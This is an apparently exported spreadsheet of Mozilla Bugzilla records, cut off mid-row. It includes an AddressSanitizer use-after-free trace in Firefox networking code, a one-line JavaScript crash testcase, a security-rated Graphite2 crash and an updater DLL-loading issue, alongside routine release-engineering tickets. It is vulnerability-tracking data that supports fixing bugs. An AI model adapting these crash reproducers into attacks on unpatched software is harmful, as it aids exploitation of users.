    #4 0x7f208fb5c129 (libssl3.so!ssl_DefClose+0xb9)
	Line 205 of "ssldef.c"
    #5 0x7f208a2baa20 (libxul.so!nsNSSSocketInfo::CloseSocketAndDestroy(nsNSSShutDownPreventionLock const&amp;)+0xe0)
	Line 843 of "/builds/slave/m-in-l64-asan-0000000000000000/build/security/manager/ssl/src/nsNSSIOLayer.cpp"
    #6 0x7f208a2bc873 (libxul.so!nsSSLIOLayerClose(PRFileDesc*)+0x93)
	Line 821 of "/builds/slave/m-in-l64-asan-0000000000000000/build/security/manager/ssl/src/nsNSSIOLayer.cpp"
    #7 0x7f2084fa9f72 (libxul.so!nsSocketTransport::ReleaseFD_Locked(PRFileDesc*)+0x272)
	Line 1604 of "/builds/slave/m-in-l64-asan-0000000000000000/build/netwerk/base/src/nsSocketTransport2.cpp"
    #8 0x7f2084fb5d8e (libxul.so!nsSocketTransport::OnSocketDetached(PRFileDesc*)+0x3ce)
	Line 1867 of "/builds/slave/m-in-l64-asan-0000000000000000/build/netwerk/base/src/nsSocketTransport2.cpp"
    #9 0x7f2084fbbe0f (libxul.so!nsSocketTransportService::DetachSocket(nsSocketTransportService::SocketContext*, nsSocketTransportService::SocketContext*)+0x12f)
	Line 181 of "/builds/slave/m-in-l64-asan-0000000000000000/build/netwerk/base/src/nsSocketTransportService2.cpp"
    #10 0x7f2084fc0757 (libxul.so!nsSocketTransportService::DoPollIteration(bool)+0x9e7)
	Line 862 of "/builds/slave/m-in-l64-asan-0000000000000000/build/netwerk/base/src/nsSocketTransportService2.cpp"
    #11 0x7f2084fbf94f (libxul.so!nsSocketTransportService::Run()+0x31f)
	Line 684 of "/builds/slave/m-in-l64-asan-0000000000000000/build/netwerk/base/src/nsSocketTransportService2.cpp"
    #12 0x7f2084fc1139 (libxul.so!non-virtual thunk to nsSocketTransportService::Run()+0x9)
	Line 728 of "/builds/slave/m-in-l64-asan-0000000000000000/build/netwerk/base/src/nsSocketTransportService2.cpp"
    #13 0x7f2084ed9cf7 (libxul.so!nsThread::ProcessNextEvent(bool, bool*)+0xbd7)
	Line 637 of "/builds/slave/m-in-l64-asan-0000000000000000/build/xpcom/threads/nsThread.cpp"
    #14 0x7f2084db26d1 (libxul.so!NS_ProcessNextEvent(nsIThread*, bool)+0xb1)
	Line 263 of "/builds/slave/m-in-l64-asan-0000000000000000/build/xpcom/glue/nsThreadUtils.cpp"
    #15 0x7f20856d484f (libxul.so!mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*)+0x1cf)
	Line 301 of "/builds/slave/m-in-l64-asan-0000000000000000/build/ipc/glue/MessagePump.cpp"
    #16 0x7f20856452f3 (libxul.so!MessageLoop::Run()+0x1c3)
	Line 226 of "/builds/slave/m-in-l64-asan-0000000000000000/build/ipc/chromium/src/base/message_loop.cc"
    #17 0x7f2084ed69a2 (libxul.so!nsThread::ThreadFunc(void*)+0x192)
	Line 258 of "/builds/slave/m-in-l64-asan-0000000000000000/build/xpcom/threads/nsThread.cpp"
    #18 0x7f2091dd7c49 (libnspr4.so!_pt_root+0x4e9)
	Line 205 of "/builds/slave/m-in-l64-asan-0000000000000000/build/nsprpub/pr/src/pthreads/ptthread.c"
    #19 0x44cf03 (firefox!__asan::AsanThread::ThreadStart(unsigned long)+0x83)
	Line 138 of "/builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_thread.cc"
    #20 0x7f20963c3e99 (libpthread.so.0!start_thread+0xd9)
	Line 308 of "pthread_create.c"
    #21 0x7f20954ce3fc (libc.so.6!clone+0x6c)
	Line 112 of "../sysdeps/unix/sysv/linux/x86_64/clone.S"
0x61d0013a9f38 is located 696 bytes inside of 2048-byte region [0x61d0013a9c80,0x61d0013aa480)
freed by thread T0 here:
    #0 0x446255 (firefox!free+0x55)
	Line 64 of "/builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc"
    #1 0x7f209195c7c3 (libplds4.so!PL_FinishArenaPool+0x43)
	Line 277 of "/builds/slave/m-in-l64-asan-0000000000000000/build/nsprpub/lib/ds/plarena.c"
    #2 0x7f20891da741 (libxul.so!PresShell::Paint(nsView*, nsRegion const&amp;, unsigned int)+0xe11)
	Line 5847 of "/builds/slave/m-in-l64-asan-0000000000000000/build/layout/base/nsPresShell.cpp"
    #3 0x7f208817a87c (libxul.so!nsViewManager::ProcessPendingUpdatesForView(nsView*, bool)+0x3fc)
	Line 420 of "/builds/slave/m-in-l64-asan-0000000000000000/build/view/src/nsViewManager.cpp"
    #4 0x7f20891fe1d0 (libxul.so!nsRefreshDriver::Tick(long, mozilla::TimeStamp)+0x2ba0)
	Line 1207 of "/builds/slave/m-in-l64-asan-0000000000000000/build/layout/base/nsRefreshDriver.cpp"
    #5 0x7f2089202030 (libxul.so!mozilla::RefreshDriverTimer::Tick()+0x1f0)
	Line 168 of "/builds/slave/m-in-l64-asan-0000000000000000/build/layout/base/nsRefreshDriver.cpp"
    #6 0x7f2084ee1d83 (libxul.so!nsTimerImpl::Fire()+0x6b3)
	Line 551 of "/builds/slave/m-in-l64-asan-0000000000000000/build/xpcom/threads/nsTimerImpl.cpp"
    #7 0x7f2084ee24e6 (libxul.so!nsTimerEvent::Run()+0x66)
	Line 635 of "/builds/slave/m-in-l64-asan-0000000000000000/build/xpcom/threads/nsTimerImpl.cpp"
    #8 0x7f2084db26d1 (libxul.so!NS_ProcessNextEvent(nsIThread*, bool)+0xb1)
	Line 263 of "/builds/slave/m-in-l64-asan-0000000000000000/build/xpcom/glue/nsThreadUtils.cpp"
    #9 0x7f20856d3a60 (libxul.so!mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*)+0x2f0)
	Line 134 of "/builds/slave/m-in-l64-asan-0000000000000000/build/ipc/glue/MessagePump.cpp"
    #10 0x7f20856452f3 (libxul.so!MessageLoop::Run()+0x1c3)
	Line 226 of "/builds/slave/m-in-l64-asan-0000000000000000/build/ipc/chromium/src/base/message_loop.cc"
    #11 0x7f208780da5c (libxul.so!nsBaseAppShell::Run()+0x5c)
	Line 161 of "/builds/slave/m-in-l64-asan-0000000000000000/build/widget/xpwidgets/nsBaseAppShell.cpp"
    #12 0x7f208a316bda (libxul.so!XREMain::XRE_main(int, char**, nsXREAppData const*)+0x4fa)
	Line 4091 of "/builds/slave/m-in-l64-asan-0000000000000000/build/toolkit/xre/nsAppRunner.cpp"
    #13 0x7f208a317b0b (libxul.so!XRE_main+0x3ab)
	Line 4331 of "/builds/slave/m-in-l64-asan-0000000000000000/build/toolkit/xre/nsAppRunner.cpp"
    #14 0x459dcd (firefox!main+0x94d)
	Line 280 of "/builds/slave/m-in-l64-asan-0000000000000000/build/browser/app/nsBrowserApp.cpp"
    #15 0x7f20953fb76c (libc.so.6!__libc_start_main+0xec)
	Line 226 of "libc-start.c"
previously allocated by thread T3 (Socket Thread) here:
    #0 0x446395 (firefox!malloc+0x55)
	Line 74 of "/builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc"
    #1 0x7f209195bd8d (libplds4.so!PL_ArenaAllocate+0x1ed)
	Line 203 of "/builds/slave/m-in-l64-asan-0000000000000000/build/nsprpub/lib/ds/plarena.c"
Thread T3 (Socket Thread) created by T0 here:
    #0 0x437801 (firefox!pthread_create+0x71)
	Line 155 of "/builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc"
    #1 0x7f2091dd3be5 (libnspr4.so!_PR_CreateThread+0x4a5)
	Line 445 of "/builds/slave/m-in-l64-asan-0000000000000000/build/nsprpub/pr/src/pthreads/ptthread.c"
    #2 0x7f2091dd3737 (libnspr4.so!PR_CreateThread+0x17)
	Line 528 of "/builds/slave/m-in-l64-asan-0000000000000000/build/nsprpub/pr/src/pthreads/ptthread.c"
Shadow bytes around the buggy address:
  0x0c3a8026d390: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c3a8026d3a0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c3a8026d3b0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c3a8026d3c0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c3a8026d3d0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=&gt;0x0c3a8026d3e0: fd fd fd fd fd fd fd[fd]fd fd fd fd fd fd fd fd
  0x0c3a8026d3f0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c3a8026d400: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c3a8026d410: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c3a8026d420: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c3a8026d43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5650==ABORTING</t>
        </is>
      </c>
      <c r="X5453" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5454">
      <c r="A5454" t="n">
        <v>1032208</v>
      </c>
      <c r="B5454" t="inlineStr">
        <is>
          <t>2014-06-30 07:35:12 -0700</t>
        </is>
      </c>
      <c r="C5454" t="inlineStr">
        <is>
          <t>Assertion failure: v.isObject(), at json.cpp:508 or Crash [@ GetObjectClass] or Crash [@ js::ObjectClassIs] with Symbol and JSON</t>
        </is>
      </c>
      <c r="D5454" t="inlineStr">
        <is>
          <t>2016-06-04 16:02:25 -0700</t>
        </is>
      </c>
      <c r="E5454" t="n">
        <v>1</v>
      </c>
      <c r="F5454" t="n">
        <v>1</v>
      </c>
      <c r="G5454" t="n">
        <v>3</v>
      </c>
      <c r="H5454" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5454" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5454" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K5454" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5454" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5454" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5454" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5454" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5454" t="inlineStr">
        <is>
          <t>[jsbugmon:update,bisect][adv-main33+]</t>
        </is>
      </c>
      <c r="Q5454" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5454" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5454" t="inlineStr">
        <is>
          <t>mozilla33</t>
        </is>
      </c>
      <c r="T5454" t="n">
        <v>1</v>
      </c>
      <c r="U5454" t="n">
        <v>0</v>
      </c>
      <c r="V5454" t="n">
        <v>14</v>
      </c>
      <c r="W5454" t="inlineStr">
        <is>
          <t>The following testcase asserts on mozilla-central revision b6408c32a170 (run with --fuzzing-safe --ion-eager):
JSON.stringify(Symbol());</t>
        </is>
      </c>
      <c r="X5454" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5455">
      <c r="A5455" t="n">
        <v>233486</v>
      </c>
      <c r="B5455" t="inlineStr">
        <is>
          <t>2004-02-09 00:06:00 -0800</t>
        </is>
      </c>
      <c r="C5455" t="inlineStr">
        <is>
          <t>Browser hangs while performing editusers.cgi - updated users page is shown incompletely</t>
        </is>
      </c>
      <c r="D5455" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:38 -0800</t>
        </is>
      </c>
      <c r="E5455" t="n">
        <v>1</v>
      </c>
      <c r="F5455" t="n">
        <v>1</v>
      </c>
      <c r="G5455" t="n">
        <v>4</v>
      </c>
      <c r="H5455" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5455" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J5455" t="inlineStr">
        <is>
          <t>Administration</t>
        </is>
      </c>
      <c r="K5455" t="inlineStr">
        <is>
          <t>2.17.4</t>
        </is>
      </c>
      <c r="L5455" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5455" t="inlineStr">
        <is>
          <t>Windows 2000</t>
        </is>
      </c>
      <c r="N5455" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5455" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5455" t="inlineStr">
        <is>
          <t>[does not affect 2.16.x] [fixed in 2.18rc1]</t>
        </is>
      </c>
      <c r="Q5455" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5455" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S5455" t="inlineStr">
        <is>
          <t>Bugzilla 2.18</t>
        </is>
      </c>
      <c r="T5455" t="n">
        <v>1</v>
      </c>
      <c r="U5455" t="n">
        <v>0</v>
      </c>
      <c r="V5455" t="n">
        <v>35</v>
      </c>
      <c r="W5455" t="inlineStr">
        <is>
          <t>User-Agent:       
Build Identifier: Bugzilla 2.17.4
The problem seems to occur as long as the user has only rights to create/edit
components (no explicit edit user rights). 
If I want to assign other people to a project group the browser will need a lot
of time to perform the editusers script. After a few minutes the "updates user"
site is shown incompletely (no other information, no footer --&gt; see attached
picture). My administrator can't reproduce the problem because he hasn't any
problem to edit users. 
Usres with same rights have the problems too.
Reproducible: Always
Steps to Reproduce:
1.click "edit users" in footer
2.select a user
3.assign group access
4.press "update"
5.wait, wait, ...
Actual Results:  
Site is shown incompletely.
Expected Results:  
Show the result of my action and the page footer.
Browser: Mozilla Firebird / MS Explorer</t>
        </is>
      </c>
      <c r="X5455" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5456">
      <c r="A5456" t="n">
        <v>475916</v>
      </c>
      <c r="B5456" t="inlineStr">
        <is>
          <t>2009-01-29 00:42:37 -0800</t>
        </is>
      </c>
      <c r="C5456" t="inlineStr">
        <is>
          <t>crash when click on upper right hand corner search box of facebook [@ TraceRecorder::set]</t>
        </is>
      </c>
      <c r="D5456" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:47 -0700</t>
        </is>
      </c>
      <c r="E5456" t="n">
        <v>1</v>
      </c>
      <c r="F5456" t="n">
        <v>1</v>
      </c>
      <c r="G5456" t="n">
        <v>3</v>
      </c>
      <c r="H5456" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5456" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5456" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K5456" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5456" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5456" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5456" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5456" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5456" t="inlineStr">
        <is>
          <t>fixed-in-tracemonkey</t>
        </is>
      </c>
      <c r="Q5456" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5456" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5456" t="inlineStr">
        <is>
          <t>mozilla1.9.1b3</t>
        </is>
      </c>
      <c r="T5456" t="n">
        <v>1</v>
      </c>
      <c r="U5456" t="n">
        <v>2</v>
      </c>
      <c r="V5456" t="n">
        <v>35</v>
      </c>
      <c r="W5456" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.9.2a1pre) Gecko/20090128 Minefield/3.2a1pre
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.9.2a1pre) Gecko/20090128 Minefield/3.2a1pre
After clicking on the search box of http://www.facebook.com at upper right hand corner, firefox will crash.
Crash even with new profile with no plugin, but it will not crash in Safe Mode.
Reproducible: Always
Steps to Reproduce:
1.browse to http://www.facebook.com and logon
2.click on the search box on the upper right hand corner
3.crash without typing anything
Actual Results:  
crashed
Expected Results:  
allow to type the search string
start appear in hourly build 20090128 (I am using 20090128190032)</t>
        </is>
      </c>
      <c r="X5456" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5457">
      <c r="A5457" t="n">
        <v>774845</v>
      </c>
      <c r="B5457" t="inlineStr">
        <is>
          <t>2012-07-17 13:40:32 -0700</t>
        </is>
      </c>
      <c r="C5457" t="inlineStr">
        <is>
          <t>fabric should run "make update"</t>
        </is>
      </c>
      <c r="D5457" t="inlineStr">
        <is>
          <t>2018-05-08 15:19:48 -0700</t>
        </is>
      </c>
      <c r="E5457" t="n">
        <v>1</v>
      </c>
      <c r="F5457" t="n">
        <v>1</v>
      </c>
      <c r="G5457" t="n">
        <v>5</v>
      </c>
      <c r="H5457" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5457" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J5457" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5457" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L5457" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5457" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5457" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5457" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5457" t="inlineStr"/>
      <c r="Q5457" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5457" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5457" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5457" t="n">
        <v>1</v>
      </c>
      <c r="U5457" t="n">
        <v>0</v>
      </c>
      <c r="V5457" t="n">
        <v>2</v>
      </c>
      <c r="W5457" t="inlineStr">
        <is>
          <t>Created attachment 643121
use make update
...because it updates the JSON file as well, while def update doesn't.</t>
        </is>
      </c>
      <c r="X5457" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5458">
      <c r="A5458" t="n">
        <v>589583</v>
      </c>
      <c r="B5458" t="inlineStr">
        <is>
          <t>2010-08-22 11:55:22 -0700</t>
        </is>
      </c>
      <c r="C5458" t="inlineStr">
        <is>
          <t>Add SeaMonkey 2.1a3 to bouncer</t>
        </is>
      </c>
      <c r="D5458" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E5458" t="n">
        <v>1</v>
      </c>
      <c r="F5458" t="n">
        <v>1</v>
      </c>
      <c r="G5458" t="n">
        <v>5</v>
      </c>
      <c r="H5458" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5458" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J5458" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5458" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L5458" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5458" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5458" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5458" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5458" t="inlineStr"/>
      <c r="Q5458" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5458" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5458" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5458" t="n">
        <v>1</v>
      </c>
      <c r="U5458" t="n">
        <v>0</v>
      </c>
      <c r="V5458" t="n">
        <v>3</v>
      </c>
      <c r="W5458" t="inlineStr">
        <is>
          <t>The SeaMonkey team is preparing a milestone release, SeaMonkey 2.1a3 (to go public in the upcoming week, probably, current target for me is Tuesday, Aug 24), and once again, we'd like to have the builds added to bouncer for downloads.
The relevant URLs to add are (bouncer and FTP):
http://download.mozilla.org/?product=seamonkey-2.1a3&amp;os=win&amp;lang=en-US
http://releases.mozilla.org/pub/mozilla.org/seamonkey/releases/2.1a3/win32/en-US/SeaMonkey%20Setup%202.1%20Alpha%203.exe
http://download.mozilla.org/?product=seamonkey-2.1a3&amp;os=linux&amp;lang=en-US
http://releases.mozilla.org/pub/mozilla.org/seamonkey/releases/2.1a3/linux-i686/en-US/seamonkey-2.1a3.tar.bz2
http://download.mozilla.org/?product=seamonkey-2.1a3&amp;os=osx&amp;lang=en-US
http://releases.mozilla.org/pub/mozilla.org/seamonkey/releases/2.1a3/mac/en-US/SeaMonkey%202.1%20Alpha%203.dmg
http://download.mozilla.org/?product=seamonkey-2.1a3-complete&amp;os=win&amp;lang=en-US
http://releases.mozilla.org/pub/mozilla.org/seamonkey/releases/2.1a3/update/win32/en-US/seamonkey-2.1a3.complete.mar
http://download.mozilla.org/?product=seamonkey-2.1a3-complete&amp;os=linux&amp;lang=en-US
http://releases.mozilla.org/pub/mozilla.org/seamonkey/releases/2.1a3/update/linux-i686/en-US/seamonkey-2.1a3.complete.mar
http://download.mozilla.org/?product=seamonkey-2.1a3-complete&amp;os=osx&amp;lang=en-US
http://releases.mozilla.org/pub/mozilla.org/seamonkey/releases/2.1a3/update/mac/en-US/seamonkey-2.1a3.complete.mar
http://download.mozilla.org/?product=seamonkey-2.1a3-partial-2.1a2&amp;os=win&amp;lang=en-US
http://releases.mozilla.org/pub/mozilla.org/seamonkey/releases/2.1a3/update/win32/en-US/seamonkey-2.1a2-2.1a3.partial.mar
http://download.mozilla.org/?product=seamonkey-2.1a3-partial-2.1a2&amp;os=linux&amp;lang=en-US
http://releases.mozilla.org/pub/mozilla.org/seamonkey/releases/2.1a3/update/linux-i686/en-US/seamonkey-2.1a2-2.1a3.partial.mar
http://download.mozilla.org/?product=seamonkey-2.1a3-partial-2.1a2&amp;os=osx&amp;lang=en-US
http://releases.mozilla.org/pub/mozilla.org/seamonkey/releases/2.1a3/update/mac/en-US/seamonkey-2.1a2-2.1a3.partial.mar
As usual with alphas, this is en-US-only.</t>
        </is>
      </c>
      <c r="X5458" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5459">
      <c r="A5459" t="n">
        <v>860307</v>
      </c>
      <c r="B5459" t="inlineStr">
        <is>
          <t>2013-04-10 08:32:11 -0700</t>
        </is>
      </c>
      <c r="C5459" t="inlineStr">
        <is>
          <t>Put a copy of bouncer db backups somewhere devs can access</t>
        </is>
      </c>
      <c r="D5459" t="inlineStr">
        <is>
          <t>2014-10-17 12:46:24 -0700</t>
        </is>
      </c>
      <c r="E5459" t="n">
        <v>1</v>
      </c>
      <c r="F5459" t="n">
        <v>1</v>
      </c>
      <c r="G5459" t="n">
        <v>5</v>
      </c>
      <c r="H5459" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5459" t="inlineStr">
        <is>
          <t>Data &amp; BI Services Team</t>
        </is>
      </c>
      <c r="J5459" t="inlineStr">
        <is>
          <t>DB: MySQL</t>
        </is>
      </c>
      <c r="K5459" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L5459" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5459" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5459" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5459" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5459" t="inlineStr">
        <is>
          <t>[2013q3] August</t>
        </is>
      </c>
      <c r="Q5459" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5459" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5459" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5459" t="n">
        <v>1</v>
      </c>
      <c r="U5459" t="n">
        <v>0</v>
      </c>
      <c r="V5459" t="n">
        <v>5</v>
      </c>
      <c r="W5459" t="inlineStr">
        <is>
          <t>Let's say daily, and keep the last 5 days.  You can probably put them up on khan?  If not, is there an admin node for the bouncer cluster that you could put them on that we could get access to?</t>
        </is>
      </c>
      <c r="X5459" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5460">
      <c r="A5460" t="n">
        <v>753230</v>
      </c>
      <c r="B5460" t="inlineStr">
        <is>
          <t>2012-05-08 20:30:24 -0700</t>
        </is>
      </c>
      <c r="C5460" t="inlineStr">
        <is>
          <t>Graphite 2 crash [@graphite2::Silf::readClassMap]</t>
        </is>
      </c>
      <c r="D5460" t="inlineStr">
        <is>
          <t>2012-10-25 17:57:07 -0700</t>
        </is>
      </c>
      <c r="E5460" t="n">
        <v>1</v>
      </c>
      <c r="F5460" t="n">
        <v>1</v>
      </c>
      <c r="G5460" t="n">
        <v>3</v>
      </c>
      <c r="H5460" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5460" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5460" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K5460" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5460" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5460" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N5460" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5460" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5460" t="inlineStr">
        <is>
          <t>[asan][sg:high][advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q5460" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5460" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5460" t="inlineStr">
        <is>
          <t>mozilla15</t>
        </is>
      </c>
      <c r="T5460" t="n">
        <v>1</v>
      </c>
      <c r="U5460" t="n">
        <v>0</v>
      </c>
      <c r="V5460" t="n">
        <v>10</v>
      </c>
      <c r="W5460" t="inlineStr">
        <is>
          <t>Created attachment 622274
testcase</t>
        </is>
      </c>
      <c r="X5460" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5461">
      <c r="A5461" t="n">
        <v>42178</v>
      </c>
      <c r="B5461" t="inlineStr">
        <is>
          <t>2000-06-11 13:34:35 -0700</t>
        </is>
      </c>
      <c r="C5461" t="inlineStr">
        <is>
          <t>BACK causes data corruption in form</t>
        </is>
      </c>
      <c r="D5461" t="inlineStr">
        <is>
          <t>2000-07-07 17:35:40 -0700</t>
        </is>
      </c>
      <c r="E5461" t="n">
        <v>1</v>
      </c>
      <c r="F5461" t="n">
        <v>1</v>
      </c>
      <c r="G5461" t="n">
        <v>3</v>
      </c>
      <c r="H5461" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5461" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5461" t="inlineStr">
        <is>
          <t>Layout: Form Controls</t>
        </is>
      </c>
      <c r="K5461" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5461" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5461" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5461" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5461" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5461" t="inlineStr">
        <is>
          <t>[dogfood+][nsbeta2+]</t>
        </is>
      </c>
      <c r="Q5461" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5461" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5461" t="inlineStr">
        <is>
          <t>M17</t>
        </is>
      </c>
      <c r="T5461" t="n">
        <v>1</v>
      </c>
      <c r="U5461" t="n">
        <v>0</v>
      </c>
      <c r="V5461" t="n">
        <v>52</v>
      </c>
      <c r="W5461" t="inlineStr">
        <is>
          <t>1. open any bugzilla bug
2. make sure there is 1 (or more?) entries on the cc line
3. go to another page
4. go back
5. notice the cc line is corrupt.  It's contents are entered twice.</t>
        </is>
      </c>
      <c r="X5461" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5462">
      <c r="A5462" t="n">
        <v>750850</v>
      </c>
      <c r="B5462" t="inlineStr">
        <is>
          <t>2012-05-01 12:39:11 -0700</t>
        </is>
      </c>
      <c r="C5462" t="inlineStr">
        <is>
          <t>Updater.exe loads wsock32.dll from application directory</t>
        </is>
      </c>
      <c r="D5462" t="inlineStr">
        <is>
          <t>2012-06-21 09:08:12 -0700</t>
        </is>
      </c>
      <c r="E5462" t="n">
        <v>1</v>
      </c>
      <c r="F5462" t="n">
        <v>1</v>
      </c>
      <c r="G5462" t="n">
        <v>3</v>
      </c>
      <c r="H5462" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5462" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J5462" t="inlineStr">
        <is>
          <t>Application Update</t>
        </is>
      </c>
      <c r="K5462" t="inlineStr">
        <is>
          <t>12 Branch</t>
